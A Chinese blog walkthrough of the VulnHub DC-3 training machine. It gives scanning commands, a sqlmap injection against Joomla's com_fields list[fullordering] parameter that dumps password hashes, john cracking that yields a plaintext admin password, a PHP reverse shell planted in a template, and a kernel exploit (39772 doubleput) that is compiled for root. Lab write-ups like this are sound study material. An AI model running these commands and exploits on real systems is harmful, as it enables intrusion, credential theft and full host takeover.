vulnhub-dc-3

最新推荐文章于 2024-04-11 10:57:39 发布
最新推荐文章于 2024-04-11 10:57:39 发布
阅读量236 收藏
点赞数 1
分类专栏: vulnhub 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45414878/article/details/106503754
版权

vulnhub-dc-3


vulnhub第四个靶机

靶机地址: https://www.vulnhub.com/entry/dc-32,312/.

知识点

nmap

用nmap查询局域网内存活的主机,发现靶机ip

nmap 192.168.88.0/24 -T4

在这里插入图片描述
用nmap进行更详细的探测,发现开着的端口和服务

端口服务
80http
nmap 192.168.88.139 -T4 -A -sV -p-

nmap扫出了是joomlaCMS,在github上有专门的扫描工具 joomscan.

在这里插入图片描述

joomlaCMS的sql注入

端口:80——>web漏洞——>成功

用joomscan对其进行扫描,发现网站管理后台和joomla版本

./joomscan.pl --url 192.168.88.139

在这里插入图片描述
在kali中寻找该版本漏洞信息,发现两条关于注入的利用方法,我这里使用的是42033.txt里面的方法

在这里插入图片描述
注入成功

sqlmap -u "http://192.168.88.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --dbs

在这里插入图片描述
成功爆出用户名和hash密码,再配合john爆破hash,成功获取明文密码。

sqlmap -u "http://192.168.88.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D 'joomladb' -T '#__users' -C 'name','password'  --dump

在这里插入图片描述

john --wordlist=rockyou.txt dc3.txt

admin:snoopy

在这里插入图片描述

反弹shell

如下图所示编写nc的php反弹shell,在kali设置监听,然后访问木马,即可收到反弹shell


需要注意的是这个一句话的路径是:http://192.168.88.139/templates/beez3/index.php

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

内核提权ubuntu 16.04

python -c "import pty;pty.spawn('/bin/bash')"

接下来就是提权部分,但是查看了一下,没有可执行sudo命令的用户,没有suid权限的可执行命令或者文件,没有定时任务,没有权限滥用危险文件。万不得已只能试一下内核提权了。

在这里插入图片描述

searchsploit ubuntu 16.04 
cat /usr/share/exploitdb/exploits/linux/local/39772.txt
wget 
unzip 39772.zip  #解压29772.zip文件
cd 39772
tar -xvf exploit.tar  #解压exploit提权脚本tar包
cd ebpf_mapfd_doubleput_exploit
./compile.sh 
./doubleput
id

在这里插入图片描述

ps:

个人站点博客:XingHe,欢迎来踩~

参考链接: https://blog.csdn.net/weixin_44426869/article/details/104779201?fps=1&locationNum=2.

XingHe_0
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub-DC系列通关记DC3靶机渗透
qq_35258210的博客
02-15 543
声明:此文章仅供参考学习,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。 目录 明确目标 信息收集 whatweb指纹识别工具 dirb目录扫描工具 joomscan(joomla框架专门的漏洞扫描器) searchsploit Ndya搜索工具 渗透攻击 sqlmap使用 john密码爆破工具 后渗透 提权&flag ----nc瑞士军刀工具 靶机汇总:https://blog.csdn.net/qq_35258210/article/d
VulnHubDC-3
qq_45434762的博客
03-23 476
一个粗糙的信息收集通过扫描端口信息,我们看到服务器只开放了一个80端口,运行的是Joomla框架我们打开网站看看在首页提示我们,这个靶机只有一个Flag,并且没有任何线索使用dirb扫...
vulnhubdc3
qq_54030686的博客
06-08 266
各位师傅可直接移步至 查看此篇即可,本人只当做笔记,以理清逻辑关系 主机发现 nmap -sS 192.168.2.0/24 发现测试靶机的ip为192.168.2.107,进行端口扫描 发现仅80端口开放进行指纹识别 发现网站使用的框架为joomla,使用专属的joomlascan进行检测, (中途更改了下环境,现在目标为192.168.43.131,本机ip为192.168.4.128) 打开相应界面 使用joomlascan进行检测 并未检测到相关漏洞,但检测到了后台路径和joomla 3.7版本,谷
Vulnhub系列_DC-3
weixin_41064688的博客
01-10 856
Vulnhub系列_DC-3 DC系列下载地址:https://download.vulnhub.com/dc/或http://www.five86.com/downloads.html 工具和漏洞: Netdiscover:进行网络发现 Nmap:端口扫描 Whatweb: 识别靶机网址使用的web服务、系统版本、CMS系统等 Joomscan: 扫描Joomla相关配置内容、检测已知漏洞等 S...
vulnhub渗透测试靶机DC-3
weixin_46128614的博客
01-11 789
靶机下载:https://www.vulnhub.com/entry/dc-3,312/ nmap 扫描只有一个80端口 直接访问 没有过多提示 用dirb跑发现了后台登录页面 是一个joomld搭的开源站 没有验证码 尝试爆破管理员密码 bp发现是snoopy 进入后台 找到template页面 编辑一个php文件 提醒:此处用的是冰蝎shell。msf的shell无法连上,system(...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vulnhub靶场实战系列-DC-3实战
最新发布
05-20
vulnhub靶场实战系列-DC-3实战
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
.Net Core IIS部署安装文件.zip
04-22
.netcore iis部署文件,其中包含两个安装包dotnet-hosting-2.2.0-win.exe和DotNetCore.1.0.4_1.1.1-WindowsHosting,安装后.net core项目就可以在iis中部署了。
exploit.tar(DC3靶机所需提权exp-1)
02-20
39772.zip
Vulnhub-DC-3靶场练习
qq_44877412的博客
01-20 926
Vulnhub-DC-3 daoyuan 零、环境配置 1、虚拟机:vmware 15.5.6 2、攻击环境:kali linux 2020.3 192.168.143.128 3、靶机:DC-3 靶机直接从虚拟机wmware中打开,注意将网络适配器改为nat模式。 可能会遇到如下报错: IDE设备(磁盘/CD-ROM)配置不正确。"ide0:1"上具有一个IDE从设备, 但没有主设备。此配置在虚拟机中无法正常运行。 请使用配置编辑器将磁盘/CD-ROM 从"ide0:1"移到"ide0:0”。 解决办法
Vulnhub-DC-3靶机实战
御七彩虹猫
03-31 1025
Vulnhub-DC-3靶机实战
vulnhub靶机-DC3-Writeup
liuhanzhe的专栏
12-08 333
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-3,312/ DESCRIPTION DC-3 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. As with the previous DC releases, this one is designed with beginn
Vulnhub靶机:DC-3渗透详细过程
菜鸟学渗透
04-11 838
Vulnhub靶机:DC-3渗透详细过程
Vulnhub系列】DC3
大方子
04-08 5088
文章目录基本信息实验过程额外补充利用php反弹shell使用Linux-Exploit-suggestion来辅助提权 靶机下载地址:https://download.vulnhub.com/dc/DC-3-2.zip 基本信息 Kali:192.168.61.145 DC3:192.168.61.163 实验过程 同样先通过arpscan扫描找出DC3的IP地址 sudo arp-scan --interface eth0 192.168.61.1/24 这里可以直接看出DC3的IP地址为192.1
VulnHub——DC-3
菜鸟的学习笔记
12-30 169
DC-3 信息搜集 使用nmap进行探测和扫描 已知信息: CMS为Joomla 访问网页,没有多余的提示,表明仅有一个入口点。 搜索后得知访问/modules/mod_login/mod_login.xml文件可以查看版本,发现版本为3.1,并且发现了一个路径。 /administrator/components/com_menus/models/fields,/adminisrtator为后台登陆页面。 漏洞挖掘与利用 1、既然发现是Joomla,那么从github查找相应的工具进行攻击。 找到
Vulnhub DC-3
柠檬木有枝
07-14 1136
访问服务,发现是 joomla 服务,使用 joomlacan 扫描 joomlascan -u 192.168.6.129 3.7.0 版本,存在 SQl 注入漏洞(CVE-2017-8917) github 下载 exp 然后运行,获取到用户名密码 hash 使用 hashcat 破解 hash,破解密码得 snoopy 登录到后台 发现提示,需要获取到 root 权限 编辑模版,修改...
高频隔离软开关DC-DC变换技术研究
"2014年电源网年会上,沙德尚博士分享了关于高频隔离软开关DC-DC变换器的研究成果,主要包括全桥+Boost混合式高效率变换器、输入串联输出并联(ISOP)移相全桥全范围软开关变换器以及三电平移相+LLC混合变换器的探讨...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值